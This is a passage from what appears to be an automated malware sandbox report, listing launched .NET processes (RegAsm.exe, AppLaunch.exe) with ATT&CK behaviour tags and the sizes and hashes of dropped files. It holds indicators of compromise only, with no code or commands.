C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1620
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- System Location Discovery: System Language Discovery
PID:364
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- System Location Discovery: System Language Discovery
PID:5064
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
Filesize
1KB
MD575c68c9432489583cfc90ee7d4a8e9d7
SHA12b7d3ea37c7f255959ef060ae65c843a45a7b062
SHA256463f44994f51baee463d1d3180b40806ee8ec1c3a9acd9bd4f72f535f42fe566
SHA5127872768c71bde00d650a99c717fd90a576c0ab04398c9d44d0a66fd71ce9e335235cf54dbb54db029cadb3adf90b558df5b69794378204146b037dfaf6192f80
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
270KB
MD5fcb797ad5f0600fabe1f0f32ea35063a
SHA1c869826b399026e6a394f260f697f7daae4b30f6
SHA256dd354350e31dd582e3060e1d9e7fc89d5eee5d6af36178095ade798b5f7715ad
SHA512e5750c59aead966926ace3a71b66fa1710930c9e2ac0a08766be63302f8d09ffaf0a4549de016d1297ba52066409814518a83d68e818f26fb94fb0c5551c4623
-
Filesize
6KB
MD565bd377a23adf5d7d3f8d902d3fcead2
SHA1570381a1edc203245fa6ff087efaed510a52e16d
SHA2566bd2a145c7017b2ee3434f4893f497999d2bd11818a56794a4b6df04c0cc6120
SHA51263de2c32dc2ac8098796fba837c3ccd93ad91af293e3add8cde56e5a2d70426d83a2b88ffcc3d2c02d3a895c2f1e3502bae405db0047f0267549075a0187c236
-
Filesize
1.2MB
MD5e92a3d6ca4bde49c6f0e1e343fdae44e
SHA102c27d2e076a19f54b133bb9c57b457b242d4116
SHA25616109cec66cf252e5b851739bc9f7639a1802a0c3998b3829950e52911ca6599
SHA51219df941ca771a23756936c0ee08fd5a9218784f2712c5735245aeacb532e46215654e4ddf83fbdd4b4d6a1aac3fb2a95119d883f4b3229cc7a4c690b197e24e7
-
Filesize
648KB
MD5134af0f2fc2a9cd8976a242b81f8840f
SHA18a7acfbe935abd112af0b4eb77dc87ba595f64a5
SHA2560268871620a416498e385020574721680eae7a9d887eb995fc6d3fef61d568d8
SHA512b711acabe2dd8223accb1571f2c68d099f0977d350df4cf74b969e9b4a6fe1a563ff91cf8f81105ab3e6a94d973f6bded067e22b81192dc04ceff4212057169c